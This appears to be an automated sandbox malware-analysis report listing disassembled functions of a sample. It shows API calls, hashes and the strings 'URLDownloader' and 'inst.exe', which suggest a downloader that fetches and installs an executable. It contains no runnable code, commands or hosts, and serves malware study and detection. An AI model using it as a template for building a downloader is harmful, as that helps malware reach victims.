                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindow
                                                                                                                                                                      • String ID: inst.exe
                                                                                                                                                                      • API String ID: 2293700532-606395854
                                                                                                                                                                      • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction ID: 0a6ae5a8c0a7f2d22a216ee2994046773e4b3220c9abe0bb299dff6a22d92d4c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction Fuzzy Hash: A6512AB5D40218ABEB00DFA4CD89BAEB775FF49701F108608F605BA290D775AA90DF61
                                                                                                                                                                      Function 02861807 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 153windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 02861829
                                                                                                                                                                        • Part of subcall function 028615D7: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 02861632
                                                                                                                                                                        • Part of subcall function 028615D7: CoTaskMemFree.COMBASE(00000000), ref: 02861685
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 02861984
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 028619BF
                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 028619CE
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 028619F5
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02861A03
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02861A0D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Window$ClassCreateDispatchFolderFreeHandleKnownModulePathRegisterShowTaskTranslate
                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                      • API String ID: 1820083345-3182466430
                                                                                                                                                                      • Opcode ID: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
                                                                                                                                                                      • Instruction ID: e3fda98b27929b7e36c51eeb4c22022801b3c22077e2b015d9fcc42dfb17ba42
                                                                                                                                                                      • Opcode Fuzzy Hash: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
                                                                                                                                                                      • Instruction Fuzzy Hash: 165117B5D00258AFDB14DFA8CC44BEDBBB5FB58300F1081A9E609EB294EB755A44CF52
                                                                                                                                                                      Function 10010CB7 Relevance: 13.6, APIs: 9, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 10010CFE
                                                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 10010D18
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                                                      • Opcode ID: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
                                                                                                                                                                      • Instruction ID: 82a901a5c9dd6496ef150d4dfe0cb85e0fd21509eb0d390bdb30e226946f8a75
                                                                                                                                                                      • Opcode Fuzzy Hash: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
                                                                                                                                                                      • Instruction Fuzzy Hash: CD41BF76F00269EBDB20CF95DC41BAE3AB5FB40AA4F114919F8956F251C7B0ED818BD0
                                                                                                                                                                      Function 02861147 Relevance: 13.6, APIs: 9, Instructions: 87librarywindowloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(10012398), ref: 02861152
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 028611E8
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 02861228
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02861236
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02861240
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3658383123-0
                                                                                                                                                                      • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                      • Instruction ID: 8586ceb415dd2ea73de2acc4d2d2ff592ec1472dfa07cfd4ecab68f939b43347
                                                                                                                                                                      • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                      • Instruction Fuzzy Hash: 7431D4B4D40618AFEB14DFE5CD89BADBBB8FF48701F108119F60AAA290D7749694CF50
                                                                                                                                                                      Function 1000B4A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4D7
                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4E4
                                                                                                                                                                      • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4EF
                                                                                                                                                                      • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B50B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1504536088-3916222277
                                                                                                                                                                      • Opcode ID: bf89f8f8861aed1ab7b692ef0b5d7095335db410b563b161b5768633909dd48d
                                                                                                                                                                      • Instruction ID: 9fd4f056ea7531655faf49f776dc9014e5164f0190cfa771b6f3da1c1fb63bf9
                                                                                                                                                                      • Opcode Fuzzy Hash: bf89f8f8861aed1ab7b692ef0b5d7095335db410b563b161b5768633909dd48d
                                                                                                                                                                      • Instruction Fuzzy Hash: 085173B5D00609EFEB05CFD4C885EEEBBB5EF04381F048199E901A7259DB35AE44CBA1
                                                                                                                                                                      Function 1000B020 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B042
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B04F
                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B05A
                                                                                                                                                                      • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B067
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 623893373-0
                                                                                                                                                                      • Opcode ID: 686d5d765f072bde6da808c523b0d64b58909c4bdd405a7af84071ee35900531
                                                                                                                                                                      • Instruction ID: 8fa48943700a81e2c9b2cfce0a1ddd9ba30b149aeda4daa259b851e8e9bcb32b
                                                                                                                                                                      • Opcode Fuzzy Hash: 686d5d765f072bde6da808c523b0d64b58909c4bdd405a7af84071ee35900531
                                                                                                                                                                      • Instruction Fuzzy Hash: DE7138B5C0061DDFEB15DFA4C995AEEB7B5FF08290F104229E416B7299EB306E04CB91
                                                                                                                                                                      Function 1000AEB0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 1000AEE8
                                                                                                                                                                      • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000AF08
                                                                                                                                                                      • _Min_value.LIBCPMTD ref: 1000AF1F
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000AF33
                                                                                                                                                                      • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AF5F
                                                                                                                                                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 1000AF9D
                                                                                                                                                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 1000AFEE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1591557727-0
                                                                                                                                                                      • Opcode ID: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                      • Instruction ID: a7373feddb38768cb8e80fdeb6ca424b68bff663277300cca749af404b47d492
                                                                                                                                                                      • Opcode Fuzzy Hash: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                      • Instruction Fuzzy Hash: 1551D8B5E00209EFDB04DFA8C984AEEBBB1FF48344F108169E915A7354D730AE95DB50
                                                                                                                                                                      Function 10010D65 Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3353612457-0
                                                                                                                                                                      • Opcode ID: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                      • Instruction ID: 64606688521fabd1402afb0874e896261f6c1f2fbb559040e4c03d6bc464acc4
                                                                                                                                                                      • Opcode Fuzzy Hash: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                      • Instruction Fuzzy Hash: D0216B76F00269EEDB21CF56DC41AAF3AA9EB80AD4F014919F8945F210C7B0DD918BE0
                                                                                                                                                                      Function 1000B350 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B35D
                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B36E
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B379
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000B3A3
                                                                                                                                                                      • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B3D3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4206206407-0
                                                                                                                                                                      • Opcode ID: a80ac29afee63ac313f60e84a30f3a0ede3531dd630a483fc897834597ea8dcd
                                                                                                                                                                      • Instruction ID: f7c15c91105892140f05b25e0fcfcadb8d2072b0e91d30d5794a3d544de0fed2
                                                                                                                                                                      • Opcode Fuzzy Hash: a80ac29afee63ac313f60e84a30f3a0ede3531dd630a483fc897834597ea8dcd
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E31CEB9D00208ABEB04DFA4D8959AE7B75EF442C0F04C469F8059B24BEB31EE45CB51
                                                                                                                                                                      Function 1000AD90 Relevance: 7.6, APIs: 5, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 1000ADB1
                                                                                                                                                                      • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000ADCB
                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 1000AE1C
                                                                                                                                                                      • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AE4D
                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 1000AE7C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1074265955-0
                                                                                                                                                                      • Opcode ID: 03ae3c2052802fc7122480744b0963d50f24e8686e0047993b433f27272eacd6
                                                                                                                                                                      • Instruction ID: ac6967b09ea6245ec4af0dc33b80ef160fb563bc847464cada0f3494a0eb2000
                                                                                                                                                                      • Opcode Fuzzy Hash: 03ae3c2052802fc7122480744b0963d50f24e8686e0047993b433f27272eacd6
                                                                                                                                                                      • Instruction Fuzzy Hash: EB41E375D00289EFEB08DF98C884A9EB7B1FF88344F10C659E9299B254D730AE94CF50
                                                                                                                                                                      Function 10004020 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004037
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 10004074
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004091
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 100040A9
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 100040D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1216362210-0
                                                                                                                                                                      • Opcode ID: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
                                                                                                                                                                      • Instruction ID: d5d2fc12e147d12df5ef18d66f66630be37a1d65e2a688cbbcfc70e5b1a43c84
                                                                                                                                                                      • Opcode Fuzzy Hash: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D3152B5F40208BFEB14DF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA50CB65
                                                                                                                                                                      Function 02870D3C Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: dllmain_raw$Main@12
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2964726511-0
                                                                                                                                                                      • Opcode ID: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
                                                                                                                                                                      • Instruction ID: e08176be8d40a7c85f5adb05ce15c87b5be03c8c0a8884305ab878729c5f0e3f
                                                                                                                                                                      • Opcode Fuzzy Hash: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
                                                                                                                                                                      • Instruction Fuzzy Hash: C921747E901669AADF219E19CD40A6F7E6AEB84798B054225F81CEB210C731DD81CF91
                                                                                                                                                                      Function 100107D5 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107DD
                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107EA
                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,10014F2C), ref: 10010EED
                                                                                                                                                                      • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 10010EFC
                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,10014F90), ref: 10010F0A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1722040371-0
                                                                                                                                                                      • Opcode ID: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
                                                                                                                                                                      • Instruction ID: 6d4aa4042b719817879ad19d1f1f5d821abcde10b660f97fd496c7bb52ecdeee
                                                                                                                                                                      • Opcode Fuzzy Hash: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
                                                                                                                                                                      • Instruction Fuzzy Hash: E8F0BE38D0420DBACB04EAB5EC469DEB7ACEF00290F104530B964AD4E1EFB1F6D58A95
                                                                                                                                                                      Function 10010720 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(100172D4,URLDownloader,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000), ref: 1001072A
                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001075D
                                                                                                                                                                      • WakeAllConditionVariable.KERNEL32(100172D0,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 10010768
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                      • String ID: URLDownloader
                                                                                                                                                                      • API String ID: 1466638765-1891997712
                                                                                                                                                                      • Opcode ID: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
                                                                                                                                                                      • Instruction ID: 3181bbcb2b9caa1ef0c1f22c926e586b91b1f05f2254f4f57ba8959088f3d27b
                                                                                                                                                                      • Opcode Fuzzy Hash: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
